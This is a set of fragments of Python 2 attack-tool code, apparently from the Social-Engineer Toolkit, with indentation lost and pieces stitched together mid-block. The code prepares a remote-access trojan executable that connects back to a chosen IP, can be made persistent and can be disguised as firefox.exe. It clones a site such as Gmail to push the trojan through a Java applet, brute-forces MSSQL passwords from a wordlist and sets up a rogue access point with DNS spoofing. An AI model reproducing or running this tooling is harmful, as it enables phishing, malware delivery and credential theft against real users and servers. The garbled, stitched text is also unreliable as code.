def main():
############
# get User Input
############
ipaddr = raw_input(
core.setprompt(["9", "2"], "IP address to connect back on"))
try:
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on")))
while ratteport == 0 or ratteport > 65535:
core.PrintWarning('Port must not be equal to javaport!')
ratteport = int(
raw_input(
core.setprompt(
["9", "2"],
"Enter port RATTE Server should listen on")))
except ValueError:
ratteport = 8080
persistent = raw_input(
core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == "no" or persistent == "" or persistent == "n":
persistent = "NO"
else:
persistent = "YES"
customexe = raw_input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.PrintStatus(
"Payload has been exported to src/program_junk/ratteM.exe")
############
# start ratteserver
############
prompt = raw_input(
core.setprompt(["9", "2"],
"Start the ratteserver listener now [yes|no]"))
if prompt == "yes" or prompt == "" or prompt == "y":
core.PrintInfo("Starting ratteserver...")
ratte_listener_start(ratteport)
def scan(range, lowport, highport):
# scan the ranges
from src.core import portscan
portscan = portscan.launch(range, lowport, highport)
# if we returned values
if portscan != False:
return portscan
# if nothing is returned
if portscan == False:
setcore.PrintWarning(
"No MSSQL servers were found in the ranges specified")
return False
# return the portscan value
return portscan
def launch(cidrBlock, lowport, highport):
setcore.PrintStatus(
"SET is now scanning the IPs specified... please be patient.")
if not validateCIDRBlock(cidrBlock):
# validate its really an ip address if solo
ip_check = setcore.is_valid_ip(cidrBlock)
if ip_check != False:
setcore.PrintStatus(
"CIDR notation not specified. Trying single IP address.")
scan(cidrBlock, int(lowport), int(highport))
return host_list
else:
setcore.PrintWarning("Invalid IP Address, try again.")
else:
printCIDR(cidrBlock, lowport, highport)
return host_list
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port),
username, passwords)
# print that we were successful
setcore.PrintStatus(
"\nSuccessful login with username %s and password: %s" %
(username, passwords))
counter = 1
break
# if invalid password
except Exception, e:
pass
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
setcore.PrintWarning(
"Unable to guess the SQL password for %s with username of %s"
% (ipaddr, username))
return False
def main():
#pause=raw_input("This module has finished completing. Press <enter> to continue")
website = raw_input(
core.setprompt(["9", "2"],
"Enter website to clone (ex. https://gmail.com)"))
ipaddr = raw_input(
core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port java applet should listen on (ex. 443)")))
while javaport == 0 or javaport > 65535:
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Enter port java applet should listen on")))
except ValueError:
javaport = 80
#javaport=80
try:
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
core.PrintWarning("Port must not be equal to javaport!")
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on")))
except ValueError:
ratteport = 8080
persistent = raw_input(
core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == "no" or persistent == "" or persistent == "n":
persistent = "NO"
else:
persistent = "YES"
customexe = raw_input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#if persistent == "no" or persistent == "" or persistent == "n":
# persistent="NO"
#else:
# persistent="YES"
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.PrintInfo("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
(definepath, definepath, ratte_random),
shell=True).wait()
#######################
# start ratteserver
#######################
core.PrintInfo("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
if match2:
# replace line and define ap_channel
ap_channel = line.replace("AP_CHANNEL=", "")
# default if not found
if ap_channel == "": ap_channel = "9"
# look for dnsspoof
match3 = re.search("DNSSPOOF_PATH=", line)
if match3: dnsspoof_path = line.replace("DNSSPOOF_PATH=", "")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/local/sbin/dnsspoof"):
dnsspoof_path = "/usr/local/sbin/dnsspoof"
else:
setcore.PrintWarning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting...."
)
ExitSet()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
setcore.PrintInfo(
"For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface."
)
setcore.PrintInfo(
"""This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")""")
print("")
setcore.PrintStatus("SET will now launch nano to edit the file.")
setcore.PrintStatus(
"Press ^X to exit nano and don't forget to save the updated file!")
# check the config file
fileopen = file("config/set_config", "r")
for line in fileopen:
line = line.rstrip()
# define if we use upx encoding or not
match = re.search("UPX_ENCODE=", line)
if match:
upx_encode = line.replace("UPX_ENCODE=", "")
# set the upx flag
match1 = re.search("UPX_PATH=", line)
if match1:
upx_path = line.replace("UPX_PATH=", "")
if upx_encode == "ON":
if not os.path.isfile(upx_path):
setcore.PrintWarning(
"UPX packer not found in the pathname specified in config. Disabling UPX packing for executable"
)
upx_encode == "OFF"
# if we removed the set shells to free up space, needed for pwniexpress
match2 = re.search("SET_INTERACTIVE_SHELL=", line)
if match2:
line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
if line == "off":
sys.exit(
"\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config"
)
# make directory if it's not there
if not os.path.isfile("src/program_junk/web_clone/"):
subprocess.Popen("mkdir src/program_junk/web_clone/",
stdout=subprocess.PIPE,
answer5 = raw_input(core.setprompt("0", "City"))
# generate the request crl
subprocess.Popen(
'keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"'
% (answer1, answer2, answer3, answer4, answer5),
shell=True).wait()
core.PrintInfo("Exporting the cert request to text file...")
# generate the request and export to certreq
subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" %
(definepath),
shell=True).wait()
core.PrintStatus(
"Export successful. Exported certificate under the SET root under certreq.txt"
)
core.PrintWarning(
"You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc."
)
core.PrintWarning(
"Be sure to purchase a code signing certificate, not a normal website SSL certificate."
)
core.PrintInfo("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
cert_path = raw_input(
core.setprompt(
"0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while 1 == 1:
core.PrintError("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
print line
print "\n 99. Return to the previous menu\n"
choice = raw_input(setcore.setprompt(["9"], ""))
if choice == 'exit':
setcore.ExitSet()
if choice == '99':
menu_return = "true"
# throw error if not integer
try:
choice = int(choice)
except:
setcore.PrintWarning("An integer was not used try again")
choice = raw_input(setcore.setprompt(["9"], ""))
# start a new counter to match choice
counter = 0
if menu_return == "false":
# pull any files in the modules directory that starts with .py
for name in glob.glob("modules/*.py"):
counter = counter + 1
if counter == int(choice):
# get rid of .modules extension
name = name.replace("modules/", "")
# get rid of .py extension
# Web Attack menu choice 9: Create or Import a CodeSigning Certificate
if attack_vector == '9':
sys.path.append("src/html/unsigned")
try: reload(verified_sign)
except: import verified_sign
# Web Attack menu choice 9: Return to the Previous Menu
if attack_vector == '99': break
# Web Attack menu choice 7: Multi-Attack Web Method
if attack_vector == "7":
fileopen = file("config/set_config","r")
for line in fileopen:
line = line.rstrip()
match = re.search("APACHE_SERVER=ON",line)
if match:
setcore.PrintWarning("Apache mode is set to ON, you cannot use Multi-Attack Mode with Apache")
setcore.PrintWarning("Turn off APACHE_SERVER=ON in the SET_CONFIG and relaunch SET")
attack_vector = "30"
try:
attack_check = int(attack_vector)
except:
setcore.PrintError("ERROR:Invalid selection, going back to menu.")
break
if attack_check > 9:
raw_input("\n Invalid option. Press (return) to continue.")
break
# Web Attack menu choice 5: Man Left in the Middle Attack Method
if attack_vector == "5": choice3='0'
if attack_vector != "5":
sql_servers = sql_servers.split(",")
# start loop and brute force
for servers in sql_servers:
# this will return the following format ipaddr + "," + username + "," + str(port) + "," + passwords
if servers != "":
sql_success = mssql.brute(servers, username, port,
wordlist)
if sql_success != False:
# after each success or fail it will break into this to the above with a newline to be parsed later
master_list = master_list + sql_success + ":"
counter = 1
# if we didn't successful attack one
if counter == 0:
setcore.PrintWarning(
"Sorry. Unable to locate or fully compromise a MSSQL Server."
)
pause = raw_input(
"Press {return} to continue to the main menu.")
# if we successfully attacked one
if counter == 1:
# need to loop to keep menu going
while 1:
# set a counter to show compromised servers
counter = 1
# here we list the servers we compromised
master_names = master_list.split(":")
setcore.PrintStatus(
"Select the compromise SQL server you want to interact with:\n"
)
for success in master_names: